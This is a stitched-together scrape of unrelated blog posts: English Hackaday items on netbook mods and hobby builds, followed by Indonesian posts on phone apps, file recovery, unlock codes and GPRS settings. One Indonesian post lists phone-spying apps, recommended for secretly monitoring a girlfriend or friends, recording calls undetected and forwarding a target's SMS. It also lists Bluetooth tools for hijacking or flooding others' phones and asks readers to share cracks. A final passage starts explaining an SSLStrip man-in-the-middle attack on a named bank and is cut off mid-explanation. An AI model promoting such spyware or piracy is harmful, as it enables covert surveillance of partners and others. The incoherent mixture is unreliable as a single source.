-->

No PCIE slot? Just add one



[Leslie] likes his little Samsung N150 Plus netbook. While it packs enough punch for almost everything, it lacks in High Definition video power. That is where a Broadcom Crystal HD mini PCI express card comes in, as these little video decoders are made just for netbooks needing some HD love, but the problem is, his netbook only has one PCI express slot in it, and its occupied by the 802.11N card.
Not being bummed out by this, and not wanting to use a USB dongle device he just ripped open his netbook and added a second pci express connector to the pads on the motherboard. Sourcing the header from mouser, the install seems quick n easy, especially since Samsung was nice enough to have the pad’s tinned already, so just a little flux and a steady hand you’re good to go.
Unfortunately, there are some hidden gotcha’s as the newly installed slot is not “full featured” that both the Broadcom card and the stock wireless N card require, but he had a wireless G card that ran just fine in the newly added slot, so now its time to rock some full screen HD Hulu.

Let it Snow (Leopard)


Yet another netbook can now run OS X. This one happens to be the Samsung n310, making it our first published non-Dell netbook to accomplish the feat. The key lies in a custom (and downloadable) .ISO for intalling said operating system onto a netbook. Full instructions for the task, and an audio driver for the n310 in OS X, are available on the [ComputerSolutions] website.

Google Chrome roundup


Google Chrome made a huge splash in the past week, but will it really change the way you browse, and convince you to switch from your current browser? For those who want to play with it but don’t want Google to completely take over their lives, Chromium is the open source project behind Google Chrome. Linux and OS X users can also run Chrome using WINE, although success is not guaranteed. To make an educated choice, read Scott McCloud’s comic which explains the underpinnings. Make sure you’re aware of Chrome’s security vulnerabilities, and take advantage of Lifehacker’s guide to make your browsing experience as convenient and useful as possible. There are some great features, including the ability to log into multiple Google accounts using its much-lauded Incognito mode, which prevents Google Chrome from logging information on your browsing and downloading habits (websites you browse can still track your information). For convenience, you can also install Chrome on a USB drive, and take it anywhere with you. Explore the many Google Chrome blogs that have popped up to provide advice on hacking and tweaking the browser. Or you could just get all your information from 4chan.

Google bike hack, quick and dirty


Many of the projects we post are so well thought out and engineered, they could hardly be called “hacks”.  This one, however, falls neatly into the hack category. [Dave] wanted his very own exercise bike hooked to Google maps. Instead of setting up a control system and writing software to control Google maps, he simply hacked a USB game controller. He wired a magnetic switch directly into the board, where the “up” button is. Then he mounted the switch so that it would be triggered each time he rotated the pedal.  Though he only has the forward movement done right now, it would be pretty easy to set up a couple more switches at the base of the handle bar for left and right.
While the experience may not be quite as nice as the more complicated one, aside from head tracking, it isn’t that far off.

Tweet-a-Watt now speaks to Google Power Meter



Hackaday’s own [Devlin Thyne] has been working with Adafruit to come up with a way to use the Tweet-a-Watt along with Google Power Meter. Back in March we put out the word that Google had unveiled the API for Power Meter and [Devlin] is the first we’ve heard of to come up with a way to use your own equipment with the service. You can build your own or use Adafruit’s kit and the data pulled from your energy use will be nicely displayed using the big G’s tools. Right now there’s only support for one Tweet-a-Watt but we’d image this will evolve fairly quickly into a much larger house solution. Head over to the Tweet-a-Watt code page to get the source files for this project.
[Thanks PT]

Real-time GPS tracker with mobile phone uplink


[jayesh] wasn’t actually trying to solve any clever problems when we built his homebrew GPS tracker. He just had the hacker mentality and wanted to build something fun and useful while geeking out with electronics and software.
On the hardware side, he started with an Arduino, then added a GPS module for location detection and a GMS/GPRS module for the data uplink to his server over AT&T’s network. The Arduino uses several libraries and plenty of custom code. On the server, he worked up some wizardry with open-source packages and the Google Maps API. All of the source code and hardware details are well-documented. Put together, it’s a GPS tracker that can update a map in real-time. Sure, there are commercial products that do roughly the same thing, but where’s the fun in that? The principles here can also be put to good use in other microcontroller-based projects.

BAMF2011: Google’s SKPR Bot, not for arachnophobes


Google’s Maker Faire exhibit space is swarmed with robots…er, androids. Amidst some cool bipeds and Segway-balancers, our inner sci-fi nerd was most smitten with this hexapod design, which they’ve dubbed SKPR Bot. The “Skipper” is on hand to showcase the ease of various Google technologies: SketchUp, Android OS and the Android Open Accessory Development Kit. The whole project came together in less than six weeks.
18 servos are mounted to a framework designed in SketchUp and laser-cut by Ponoko. The low-level servo PWM control is handled by the Dev Kit (essentially a rebadged Arduino Mega, as we’ve seen), while an Android OS phone provides a slick GUI and handles all the inverse kinematics calculations required as the robot takes each step. The coolest bit is that it’s all up for grabs. At this moment you’ll have to scrounge around the ’net a bit to find the plans and code, but some time post-Faire they plan to bring everything together at the SKPR Bot site.

Fixing the Future



[iFixit] (who we’ve posted about many times before) has launched a passionate manifesto promoting the skills and knowledge of repair as a solution to technological consumerism and waste. They use powerful footage of electronic waste dumps in Ghana to make the point that we must collectively change the way we use and relate to our high technology–take a look after the break.
The manifesto rallies against the practice of withholding repair knowledge such as manuals, error codes and schematics–putting responsibility in the hands of manufacturers–but also makes it clear that it is up to every one of us to inform ourselves and to value functionality over novelty.
Considering the many-faceted resource crisis that we are headed towards, any efforts to push our behavior towards a sustainable and considerate way of life should be considered. As hackers we repair, reuse and rethink technology as part of our craft–but we are also privileged by our enthusiasm for technical challenges. The real battle is to disseminate the kind of knowledge and skills we possess into the general population. This is where the heart of [ifixit]‘s message comes into play: the creation of an open, editable online repair manual for every electronic device. If you have something to teach, why not pop over and help expand their database?

Heatless compressed air drye


The pressurized air from a standard air compressor is fine for most uses. But some applications like plasma cutting call for low-humidity air and the hardware available to facilitate this can cost a bundle. [Roland] and his cohorts at TX/RX Labs (a Houston, Texas Hackerspace) just built this air drying system.
It works using a desiccant; a substance that sequesters moister. It’s the stuff in those little packets you find in shoe boxes and the like with a warning that you shouldn’t eat it. The image above shows two chambers which house the desiccant. Only one is used at a time, so that as it’s ability to remove moisture drops, the system can switch over to the other chamber. There’s even an automatic recharging system built in that uses a portion of the dried air to remove the humidity from the unused desiccant chamber.
There’s a functional diagram at the link above. It’s resolution is low enough that the text is almost unreadable but we’ve asked [Roland] if he can repost the image. This seems like a build in which other hackerspaces will be interested.

This marriage proposal is the best PCB design ever

best_pcb_design_ever
While you will often see hacks on this site that feature high voltage, fire, and metal, that doesn’t mean that hackers, makers, and electronics geeks don’t have a soft side. In fact, we find the opposite to be true the vast majority of the time.
Take for instance [Bill Porter].
You may have seen his projects and tutorials featured here a time or two, and though I have never met him, he seems like a great guy whose heart is in the right place.
He recently decided that his college sweetheart was “the one” and had to think of a clever and surprising way to pop the question to a girl who is always one step ahead of the curve. [Mara (soon to be) Porter] was working on a project that required a custom PCB, and having never ordered one before, [Bill] was happy to help her get things in order. After sending the schematics off to [Laen] at DorkbotPDX, [Bill] fired off another email asking to have his proposal silk screened on the boards. [Laen] said he was happy to help, and so the wait began.
The boards arrived a few weeks later, and the rest, they say, was history.
How did it go? We’re guessing you’ve figured it out by now, but be sure to swing by [Bill’s] site to see how it all went down.
You know you want to…you big softie!

Mini arcade cabinet looks as good as the real thing

mame_cab
[Ed] had a netbook he no longer needed and decided to make it into a mini MAME cabinet for some of his family members. MAME cabinets are pretty plentiful, but this one was so nicely done, we wanted to share it.
He removed the monitor from an EeePC 901 in order to get some precise measurements, then went about crafting a mini cabinet from MDF. The whole thing was wrapped in sticky label paper adorned with old-school Galaga graphics, then covered in plexiglass for a nice sleek look that also protects the artwork.
He used an iPac 2 controller board to wire up all of the buttons and joystick to the netbook, opting to solder the controller’s wires directly to the USB header on the eeePC’s motherboard. A power switch was added up on top for easy operation, and the cabinet was sealed shut, though the back does open easily in the event that maintenance is required. The system is managed using the Maximus Arcade front end for MAME, which [Ed] claims is incredibly easy.
If you are interested in making your own MAME cabinet, check out some of the other MAME-based projects we have featured in the past, and don’t miss the video below of [Ed's] cabinet in action.

Aplikasi Keren buat N-series


APlikasi SENTER
APlikasi ini Cocok banget buat sobat yang punya Hape yang tidak punya Fasilitas Senter, Aplikasi mampu merubah Layar Hape menjadi Lampu dan sangat bermanfaat Waktu Lampu "Listrik" LOL mati., Dasar Kalau Nonggak kita di Obok-obok habis bahkan Layanan dicabut tanpa Kompromi, Bagaimana kalau Lampu Mati?, siapa yang bertanggung jawab?, Mana bisa rakyat keberatan?. Koq ngomongnya ngawur seh....
APLIKASI Ini Hanya Untuk Nokia Series 60
Bagi SObat yang mau coba atau hanya Sekedar jadi Koleksi silahkan di Download di sini:
David Siorpaes Flashlight v1.1.0


Aplikasi Pengirim SMS Rahasia
Apakah Anda pernah mengirim data sensitif melalui SMS seperti info kartu kredit, data rahasia dan password? Apakah Anda berpikir bahwa seseorang memata-matai Anda? Yang Anda butuhkan adalah SecretSMS. Ini mengenkripsi teks biasa ke cipher-teks yang tidak dapat terlihat tanpa password yang tepat. Penerima tidak perlu menginstal perangkat lunak apapun pada ponsel mereka, setiap jenis Handphone dapat mendekripsi pesan tersebut jika ia tahu password nya.
Jadi Jika Anda ingin Rahasia-rahasiaan Silahkan menggunakan APlikasi ini Pada Ponsel Nokia Anda. Si Pengirim Cukup memeberitahukan Password x pada sipenerima maka SMS baru bisa dibuka.
Aplikasi Ini Hanya Berlaku di install Pada NOKIA N Series
JiKa Ingin Mencoba Silahkan Ambil APlikasinya disini :
How to Secret SMS

Aplikasi SMS ANimasi
Bikin Kejutan buat si dia dengan SMS Animasi keren dan unik ini, Aplikasi ini bisa membuat SMS berbentuk Animasi dengan Gambar dan konten-konten Unik
Jika Berminat Silahkan Sedot disini
SMS ANIMATED

cara mengganti kursor blog

Agar blog terlihat lebih bervariasi, terkadang para blogger mengganti tampilan kursor blog nya ke kursor sesuai yang disenanginya. secara default kursor blog adalah berbentuk panah putih, cara mengganti kursor blog bermacam-macam bisa dengan ikon gambar atau menambahkan efek seperti bintang berjatuhan dll. Apabila anda tidak punya gambar pengganti untuk kursor anda, anda bisa memanfaatkan http://www.totallyfreecursors.com, karena pada situs tersebut terdapat ratusan/ribuan kursor yang unik.

Untuk menggantinya, berikut caranya:

  • Log in ke Blogger anda 
  • Klik Rancangan > Edit HTML 
  • Cari kode </head> 
  • Letakan kode CSS dibawah ini diatas </head>
<style type="text/css">
HTML,BODY{cursor: url("http://downloads.totallyfreecursors.com/thumbnails/cool1.gif"), auto;}
</style>
  • Jangan lupa simpan pekerjaan anda
Catatan:
Teks yang berwarna kode diatas adalah alamat kursor baru, anda bisa menggantinya dengan alamat kursor yang akan anda gunakan.
Demikan cara menganti kursor pada blog, semoga berhasil, 

Cara Membuat Recycle Bin Dalam Flashdisk


Pernahkah kalian mengalami ketika secara tidak sengaja menghapus file yang sangat penting di dalam flashdisk ??? tentu itu adalah tindakan yang sangat fatal akibatnya. Kenapa ,.,.??? karena apabila sebuah file terhapus dari Flashdisk maka file tersebut secara permanen akan terhapus. Berbeda dengan apabila kita menghapus file yang ada di Harddisk, maka filenya masih nyangkut terlebih dahulu di Recycle Bin.
Oleh karena itu New Trik Tips Komputer akan memberikan sedikit trik bagaimana membuat Recycle Bin di Dalam Flashdisk. sekarang itu bukanlah hal yang mustahil membuat Recycle Bin di Dalam Flashdisk karena sekarang ini sudah ada software portable yang namannya adalah "iBin".

Yang perlu kalian lakukan adalah mengunduh software portable tersebut, letak kan di dalam flashdisk lalu jalankan dengan cara klik 2x icon Recycle Bin. Sejak saat itulah untuk setiap kali kalian ingin menghapus sebuah file yang terdapat di flashdisk akan muncul sebuah jendela dengan pilhan untuk menghapus dile tersebut secara permanen atau ingin membuangnnya ke iBin terlebih dahulu. Setelah itu, klik kanan di ikon iBin di system tray Windows untuk mengembalikan si file ke asal, membersihkan si bin, atau membuka jendela Dumping Management di mana kalian bisa membersihkan / memulihkan file-file yang sobat inginkan.

penasaran sama software yang satu ini, langsung aja download

Download iBin Gratis

Menjalankan applikasi java melalui PC/Komputer


Image and video hosting by TinyPic

Image and video hosting by TinyPic

Sebenarnya sudah banyak teman-teman yang menuliskan secara detail bagaimana trik menjalankan aplikasi java di PC. Tapi karena banyak diantara teman-teman yang bertanya pada saya maka saya akan menuliskan panduannya disini. Pada dasarnya trik ini sangat mudah, yang penting anda mau bertanya kepada google disana akan muncul banyak pilihan cara. Coba aja masukkan kata pencaharian ini " Bagaimana cara menjalankan aplikasi java di PC " maka akan muncul banyak tutorial yang menjelaskan caranya.
Untuk menjalankan aplikasi java di PC ada dua cara yang banyak digunakan oleh teman-teman yaitu :

1. Dengan KEmulator
2. Dengan Sjboy Emulator

Dari kedua cara di atas saya lebih senang menggunakan KEmulator karena tampilannya lebih menarik dan layarnya agak besar dari pada Sjboy yang standard. Namun dengan menggunakan plugin Sjboy Malah jauh lebih besar tampilan layarnya. Akan tetapi terkadang plugin tidak berfungsi di setiap PC, entah apa sebabnya.
Berikut saya tampilkan contoh aplikasi java yaitu aplikasi ChatNDate yang dijalankan di PC dengan KEmulator dan Sjboy :

1. Gambar aplikasi CND online dengan KEmulator



2. Gambar aplikasi CND online dengan Sjboy Emulator

Selanjutnya saya akan menuliskan panduan untuk online dengan KEmulator. Pertama-tama silahkan download KEmulator yang terdiri dari dua pilihan

Download KEmulator 2,6 MB Disini

File 2,6 MB di atas khusu untuk PC yang dilengkapi dengan Java Run Time. Untuk yang tidak memilik Java Run Time silahkan download KEmultor with JRE dibawah ini, filenya sebesar 16 MB :

Download KEmulator LIte 0.98 with JRE disini

Setelah anda download aplikasi silahkan extrak file zip dan instal file exe nya. Langkah berikut download aplikasi CND dan simpan pada folder yang anda kehendaki. Untuk menjalankan aplikasi cnd silahkan arahkan kursor ke aplikasi dan klik kanan pada aplikasi CND yang telah anda simpan lalu pilih "open with » Kemulator" Untuk selanjutnya isikan nikname dan passwor anda sebagaimana di ponsel. Sampai disini anda telah sukses online di PC.

Untuk cara kedua yaitu online dengan Sjboy Emulator. Caranya sama saja dengan menggunakan KEmulator. Terlebih dahulu download aplikasinya Sjboy di sini

Sjboy tersebut sudah komplit dengan plugin untuk memperbesar tampilan layar. Setelah di download extrak file dan instal file exe nya. Selanjutnya buka aplikasi CND (open with » Sjboy).


Silahkan di coba !

Semaoga Bermanfaat.....!!!!

MENGEMBALIKAN FILE YANG TERHAPUS


recycle-binPernah menghapus file-file penting di komputer tanpa disengaja? Kasus seperti ini mungkin pernah menimpa Anda, terkadang terjadi karena kita tengah terburu-buru atau dikejar waktu.

Namun jangan khawatir, Anda bisa menggunakan tools khusus untuk mengembalikan file-file tadi. Berikut ini ada 4 tools yang bisa Anda gunakan untuk mengembalikan file yang terhapus. Tools ini dapat di-download secara gratis di internet.

1. Undelete Plus
Di antara aplikasi-aplikasi gratis yang beredar di luaran untuk mengembalikan file yang terhapus, Undelete Plus salah satu yang dapat digunakan. User interface-nya (antar muka) tergolong sangat simpel. Anda dapat mengembalikan file-file yang terhapus dengan mudah sesuai dengan tipe file, misalnya Application, GIF graphics, HTML Documents, PDF.
Tools ini beroperasi pada sistem operasi Windows 95, Windows 98, Windows Me, Windows NT, Windows 2000, Windows XP, Windows 2003 dan Windows Vista. Anda dapat men-download Undelete Plus di: http://www.undelete-plus.com/

2. Restoration
Restoration adalah salah satu aplikasi untuk mengembalikan file yang terhapus. Tools ini juga sangat mudah digunakan dan tidak perlu diinstal di komputer. Cukup download toolsnya di: http://www.snapfiles.com/get/restoration.html, lalu jalankan file executable-nya untuk mengembalikan file yang terhapus.

3. PC Inspector File Recovery
Meski user interface PC inspector File Recovery tidak begitu user friendly, aplikasi ini tergolong sangat ampuh untuk mendeteksi dan mengembalikan file yang terhapus. Sesudah dilakukan proses scanning, akan tersaji file-file yang terhapus dalam folder dengan struktur pohon (tree structure) untuk mempermudah pencarian. Dengan begitu, Anda dengan mudah dapat mencari dan memilih file/folder yang terhapus, lalu klik icon “save” untuk mengembalikan file. Tools ini dapat di-download di: http://www.pcinspector.de/Sites/file_recovery/info.htm?language=1

4. Recuva
Recuva sering disebut juga sebagai “Recover”. User interface-nya sangat sederhana. Pada mode basic, tools ini akan menampilkan daftar file-file yang terhapus yang bisa dikembalikan. Jika Anda menggantinya ke mode advanced, maka proses scanning ulang akan dilakukan dan muncul pilihan untuk menampilkan informasi berisi daftar file-file yang terhapus. Tools ini dapat di-download di: http://www.recuva.com/

Mengubah file rar menjadi jar


Untuk merename File RAR menjadi JAR tidaklah sulit,dan kita tidak perlu menambahkan softeare lagi.Untuk cara yang sederhana,kita bisa memanfaatkan WINDOWS EXPLORER yang pastinya sudah ada pada PC anda.Adapun langkah langkahnya sebagai berikut.
Pastikan tanda centang dihilangkan pada "Hide extensions for known file tipes" dengan cara :

  • Buka Windows Explorer
  • Klik Tools
  • Folder Options..
  • ViewHilangkan tanda Centang pada "Hide extensions for known file tipes"
  • kemudian klik OK
Kemudian KLIK KANAN pilih RENAME pada file yang akan direname extensinya menjadi .jar


Ok sudah tau kan caranya.....ya udah silahkan di lanjut bagi yang mau download.......


Semoga Bermanfaat......

Cara Aktifkan Handphone Terkunci | Unlocker

Cara dan Trik Mudah Membuka Handphone yang terkunci atau terLock
Apakah SObat pernah mengalami Ponsel Pribadi Terkunci dan Ponsel meminta anda untuk memasukkan Sandi, sedangkan anda lupa kodenya? Asal Jangan Lupa diri lho.
Di sini Saya posting sebuah utilitas untuk unlocking Nokia, Siemens, Samsung, Vitel, Maxel, Panasonic, Motorola, LG, dan telepon selular AEG. Utilitas ini juga mencakup kalkulator MasterCode yang dapat mengatur ulang kode keamanan Nokia jika Anda kehilangan itu.

Kode fitur WorldUnlock Kalkulator :

  • Unlock Nokia
  • Unlock LG
  • Unlock Panasonic
  • Unlock Maxon
  • Unlock Samsung
  • Unlock AEG / Telital
  • Unlock Nokia
  • Unlock Siemens
  • Unlock Sony
  • Aktifkan Vitel

Panduan mudah untuk membuka Nokia gratis:
(Silakan baca seluruh panduan sebelum memulai)

Pilih model telepon dari daftar.
Masukkan nomor IMEI telepon Anda (Tekan * # 06 # di ponsel)
Pilih negara dan penyedia layanan di mana ponsel dibeli.
Tekan tombol: Hitung!
Perangkat lunak ini menghasilkan beberapa kode untuk membuka Nokia.
Jika 7 kode tersebut ditampilkan, gunakan kode terakhir dari 7 pertama.
Jika tidak bekerja, maka cobalah 1, dan akhirnya 5.
Bila telepon menampilkan "pembatasan Sim off" itulah yg dibuka.
Jika hanya dua kode tersebut ditampilkan (+1 dan +2) masukkan mereka berdua!
Kode akan ditampilkan pada form: # pw + CODE + n #
Untuk mendapatkan p, w atau +, Pres tombol * beberapa kali.

Silahkan Download Aplikasinya
Download WorldUnlock Kalkulator Kode

Pengaturan GPRS Untuk HP China

Berikut adalah pengaturan Office Mobile, Airtel Live dan MMS Airtel untuk SEMUA HP CHINA
  1. Office Mobile
    pertama klik ikon
    SERVICES dalam menu utama ==> == DATA ACCOUNT> GPRS ==> EDIT setiap account yang ada ==>
    Nama account -> MO
    APN -> airtelgprs.com
    Auth. Jenis -> Normal
    menyimpan semua pengaturan.
    Kembalilah ke SERVICES ==> WAP ==> PENGATURAN ==> EDIT PROFIL ==> EDIT setiap account yang ada ==>
    Ubah nama Profil ==> Mobile Office
    Homepage ==> Google
    data account ==> MO (yang kita buat sebelumnya)
    Jenis Sambungan ==>
    Di sini u menemukan tiga pilihan
    a) Connection-oriented
    b) connectionless
    c) HTTP
    memilih) Koneksi berorientasi ==
    Alamat IP ==> 202.056.231.117
    Keamanan ==> off
    Sekali lagi simpan semua pengaturan dan klik tombol BACK, dan pilih "Aktifkan Profil"
    Kembalilah ke SERVICES ==> WAP ==> Situs Web
    dan  Anda siap untuk menggunakan Mobile Office ...
  2. Airtel Live
    pertama klik ikon SERVICES dalam menu utama ==> == DATA ACCOUNT> GPRS ==> EDIT setiap account yang ada ==>
    Nama account -> LIVE
    APN -> airtelfun.com
    Auth. Jenis -> Normal
    Smpan semua pengaturan.
    Kembalilah ke SERVICES ==> WAP ==> PENGATURAN ==> EDIT PROFIL ==> EDIT setiap account yang ada ==>
    Ubah nama Profil ==> Airtel Live
    Homepage ==> http://live.airtelworld.com
    data account ==> LIVE (yang kita buat sebelumnya)
    Jenis Sambungan ==>
    Di sini Anda menemukan tiga pilihan
    a) Connection-oriented
    b) connectionless
    c) HTTP
    memilih c) HTTP ==>
    Alamat proxy ==> 100.001.200.099
    Port proxy ==> 8080
    Sekali lagi simpan semua pengaturan dan klik tombol BACK, dan pilih "Aktifkan Profil"
    Kembalilah ke SERVICES ==> WAP ==> Situs Web
    dan r Anda siap untuk menggunakan Airtel Live ...
  3. MMS Airtel
    pertama klik ikon SERVICES dalam menu utama ==> == DATA ACCOUNT> GPRS ==> EDIT setiap account yang ada ==>
    Nama account -> MMS
    APN -> airtelmms.com
    Auth. Jenis -> Normal
    menyimpan semua pengaturan.
    Kembalilah ke SERVICES ==> WAP ==> PENGATURAN ==> EDIT PROFIL ==> EDIT setiap account yang ada ==>
    Ubah nama Profil ==> Airtel MMS
    Homepage ==> http://100.1.201.171:10021/mmsc
    data account ==> MMS (yang kita buat sebelumnya)
    Jenis Sambungan ==>
    Di sini u menemukan tiga pilihan
    a) Connection-oriented
    b) connectionless
    c) HTTP
    memilih c) HTTP ==>
    Alamat proxy ==> 100.1.201.172
    Port proxy ==> 8799
    Sekali lagi menyimpan semua pengaturan dan klik tombol BACK, dan pilih "Aktifkan Profil"
    Kembalilah ke JASA ==> WAP ==> Situs Web
    dan Anda siap untuk menggunakan Airtel MMS .

Kumpulan Aplikasi Penyadap Telepon dan SMS


  • Mobile Secuware
    Fitur penyadap Mobile Secuware bisa digunain utk memantau pacar aato tmen kita lewat fitur Remote Monitoringvnya. Selaen ntu Aplikasi ini dibekali kemampuan anti maling, jd klo hp ncang2 pd ilang ato di curi, kita bisa tau lewat fasilitas M-Trax (data2 nya pun bisa di selamatin)
    aplikasi nya bisa di donlot di http://www.mobile-secuware.com

  • Xelnex Lite
    Xelnex Lite bisa digunain utk ngerekam pembicaraan ditelpon tanpa didahului bunyi 'beep'. jd terjaga kerahasiaaan nya,,
    sayang nya aplikasi niy masih shareware alias bayar, tp kita bisa nyoba versi trial nya selama 10 hari n' aplikasi niy kompatibel utk Symbian S60 3rd edition.
    klo ada yg mo nyoba donlot aja di http://shop.psiloc.com/d/s60/XelnexLite_s603rd.sisx


  • NB : klo udah ada yg bisa nge crack nya, tolong di share yaa..
  • Mobile-Spy
    Pengguna hp Symbian S60 udh bisa make layanan pengintip isi hp dr jarak jauh. Dgn layanan ini mereka bisa mengetahui informasi lalu lintas sms dan telpon, yg bisa diakses dr pc ato hp laen lewwat server yg disediain.
    selaen Symbian, hp yg berbasis windows Smartphone jg bisa make aplikasi niy...
    sayang nya aplikasi niy juga msh trial, klo ada yg mo nyoba donlot di http://www.mobile-spy.com/MobileSpy.CAB versi trial nya cuman 7 hari

    NB : klo udah ada yg bisa nge crack nya, tolong di share yaa..


  • BT Info
    aplikasi yg niy cuman memanfaatkan bluetooth doank, ya jd sama lah kya aplikasi2 laen...
    klo ada yg mo nyoba, donlot di http://en.k508i.wz.cz/jar/ftp_bt_105.jar
    BT Info jg bisa digunain utk ngendaliin semua fungsi hp, kaya nelpon, kamera, alarm, master reset, ampe matiin hp juga bisa.


  • Call Rrecorder dan AGLAYA Call Magic
    fungsi nya cuman utk ngerekam pembicaraan telpon doank,,
    klo ada yg mo nyoba, donlot disini aja http://symbianware.com <== utk Call Recorder nya http://www.aglaya.com/symbian/symbia...call_magic.asp <== utk AGLAYA Call Magic nya


  • TimedSpy
    klo pnya hp Symbian S60 v.2 bisa langsung make tnpa alat tambahan,,
    fungsi nya utk mengintai orang, jd aplikasi nya melakukan pemotretan trus hasil nya lngsung dikirm gituu...
    klo ada yg mo nyoba, donlot di http://www.diginaut.com/mobile/archi...edSpyTrial.sis


  • Magic Blue Hack
    Aplikasi garapan Humayan Kabir Pavel dan Avishek Ahmed ini, kompatibel utk ponsel Java MIDP 2.0 berBluetooth, Symbian s60, dan PDA.
    Fitur yg tersedia yaitu Make Call, Send SMS, Phonebook, Write Ph Book, Answer Call, dan Hang Call.
    klo ada yg mo nyoba, donlot di http://www.getjar.com/products/175782/MagicBlueHack


  • BT Teror
    Untuk usil2an, bisa di donlot di http://www.symbian-freak.com/downloa...eror_S60v3.zip.
    Fungsi nya untuk memanipulasi bluetooth, jd aplikasi nya utk ngirim file2 ke hp target terus2an,, jd kaya flooding gitu deh...
    Aplikasi niy harus terintregrasi pula dengan program Python S60 dan Python Script Shell. Utk nge donlot Python nya bisa donlot di http://sourceforge.net/project/showf...roup_id=154155


  • Mobiscope beta
    Seiring kemajuan teknologi, dengan memanfaatkan jaringan internet kita bisa menikmati layanan video streaming. Jd, nnti nya kita bisa membroadcast pantauan webcam melalui server dari suatu penyedia layanan. Hingga kita bisa dengan mudah mengaksesnya lewat hp, sekalipun jarak kita jauh. Mayoritas ponsel yg beredar di pasaran bisa melakukannya, mengingat sudah dijejali teknologi bearer data (GPRS/3G).
    klo ada yg mo nyoba, donlot di http://www.mobiscope.com/.
    dengan aplikasi ini, kita bisa mengakses webcam lewat hp dengan aman dan nyaman. Menarik nya lg, aplikasi niy dilengkapin fitur sensor gerak dan scheduler, utk merekam situasi pada waktu tertentu.


  • SMS Anywhere
    SMS Anywhere fungsi nya nge forward semua sms yg dikirim n' diterima ponsel target ke ponsel kita.
    klo ada yg mo nyoba, donlot di http://www.wireless-labs.com/smsanywhere/

  • MITM Attack on Mandiri Internet Banking using SSLStrip

    Https (http over SSL) sebenarnya adalah protokol yang sangat aman, protokol ini menjamin keamanan data dari browser hingga web server. MITM attack (man in the middle) tidak bisa dilakukan terhadap https karena https memiliki fitur authentication sehingga attacker tidak bisa menyamar sebagai web server. Walaupun mitm attack tidak bisa dilakukan terhadap https, namun attacker tetap bisa menyerang user yang menggunakan http sebagai pintu masuk menuju https. Dalam artikel ini saya akan jelaskan tentang SSLStrip, sebuah tool yang dibuat oleh Moxie Marlinspike untuk melakukan serangan mitm terhadap pengguna situs yang dilindungi dengan https.

    SSL is not vulnerable to MITM attack
    MITM attack adalah serangan dimana attacker berada di tengah bebas mendengarkan dan mengubah percakapan antara dua pihak. Jadi dengan serangan MITM ini attacker tidak hanya pasif mendengarkan, tetapi juga aktif mengubah komunikasi yang terjadi. Sebagai contoh, pada percakapan antara Alice dan Bob, Charlie menjadi pihak yang ditengah melakukan MITM attack. Charlie tidak hanya bisa mendengarkan percakapan itu, namun juga bisa mengubah percakapannya. Ketika Alice berkata “Besok makan siang jam 7″, Charlie bisa mengubahnya menjadi “Besok makan siang dibatalkan” sehingga Bob mengira makan siang dengan Alice tidak jadi.
    Kenapa MITM attack bisa terjadi? MITM attack bisa terjadi karena sebelum berkomunikasi kedua pihak tidak melakukan authentication. Authentication berguna untuk memastikan identitas pihak yang berkomunikasi, apakah saya sedang berbicara dengan orang yang benar, atau orang ke-3 (the person in the middle) ? Tanpa authentication Alice akan mengira sedang berbicara dengan Bob, sedangkan Bob juga mengira sedang berbicara dengan Alice, padahal bisa jadi sebenarnya Alice sedang berbicara dengan Charlie dan Bob juga sedang berbicara dengan Charlie, sehingga Charlie bertindak sebagai “the person in the middle”. Seharusnya sebelum Alice dan Bob berbicara, harus ada authentication, untuk memastikan “Who are you speaking with?”. Alice harus memastikan “Are you really Bob? Prove it!”, sedangkan Bob juga harus memastikan “Are you really Alice? Prove it!”.
    SSL adalah protokol yang memiliki tingkat keamanan sangat tinggi. SSL tidak hanya mengatur tentang enkripsi, namun juga mengatur tentang authentication sehingga SSL tidak rentan terhadap serangan man in the middle. SSL menggunakan sertifikat yang memanfaatkan kunci publik dan kunci private sebagai cara untuk melakukan authentication. Dengan menggunakan sertifikat SSL ini, pengunjung web bisa yakin sedang berkomunikasi dengan web server yang benar, bukan attacker in the middle yang menyamar menjadi web server suatu situs.
    Attacker yang mencoba menjadi “the person in the middle”, akan dengan mudah ketahuan karena attacker tidak bisa membuktikan identitasnya dengan sertifikat SSL yang sah. Sertifikat SSL yang sah haruslah ditandatangani oleh CA (certificate authority) yang dipercaya dan tersimpan dalam daftar trusted CA browser. Jadi bila attacker mencoba membuat sertifikat SSL sendiri, browser akan memberi peringatan keras pada pengunjung bahwa sertifikat SSL tidak bisa dipercaya dan pengunjung disarankan untuk membatalkan kunjungan karena beresiko terkena serangan mitm. Serangan mitm attack baru bisa berhasil bila pengunjung tetap bandel dan nekat untuk menggunakan sertifikat palsu tersebut. Bila ini yang terjadi, maka kesalahan ada pada pengguna, bukan kelemahan SSL sebagai protokol. Lebih detil tentang https silakan baca Understanding Https.
    HTTPS vs HTTP, Trusted vs Untrusted
    http adalah protokol yang tidak bisa dipercaya karena rentan terhadap serangan mitm. Sedangan http over SSL (https) adalah protokol yang bisa dipercaya karena protokol ini tidak rentan terhadap serangan mitm. Informasi yang dilihat  pengunjung pada browser di sebuah page http sebenarnya tidak bisa dipercaya karena tidak ada jaminan integritas dan keontentikan data. Informasi tersebut kemungkinan sudah diubah di tengah jalan atau berasal dari sumber yang tidak otentik (orang lain). dan pengunjung tidak bisa melakukan verifikasi.
    Sedangkan informasi yang dilihat pengunjung pada browser di sebuah halaman https bisa dipercaya karena DIJAMIN informasi yang diterima adalah sama dengan yang dikirim web server dan informasi tersebut juga DIJAMIN dikirim oleh web server yang benar. Dulu saya pernah menulis artikel tentang Trusted vs Untrusted klikBCA, yang menjelaskan tentang adanya dua subdomain yang berbeda, yang trusted menggunakan https dan yang untrusted menggunakan http.
    HTTP as Gate to HTTPS
    Jarang sekali orang mengunjungi situs dengan mengetikkan https:// bahkan http:// pun orang sudah malas. Kebanyakan orang langsung mengetikkan alamat situs yang ditujunya tanpa harus diawali dengan http:// atau https://. Secara default browser akan berasumsi bahwa pengunjung akan menggunakan protokol http, bukan https bila pengunjung tidak menyebutkan protokolnya.
    Kebanyakan situs yang harus memakai https, memang dirancang untuk menerima request melalui http (port 80) atau https (port 443). Situs pada port 80 biasanya hanya dijadikan jembatan untuk menuju situs yang sebenarnya pada port 443. Bila pengunjung masuk melalui port 80, maka server akan memberikan link untuk menuju URL https, atau dengan memberikan response Redirect.
    Jadi bisa disimpulkan bahwa sebagian besar pengunjung memasuki https dengan melalui http, dengan kata lain http sebagai gerbang menuju https. Metode peralihan dari situs http ke situs https ada beberapa cara, yaitu:
    • Memberikan link menuju URL https.
    • Memberikan response redirect ke URL https.
    • Menggunakan META tag auto refresh ke URL https.
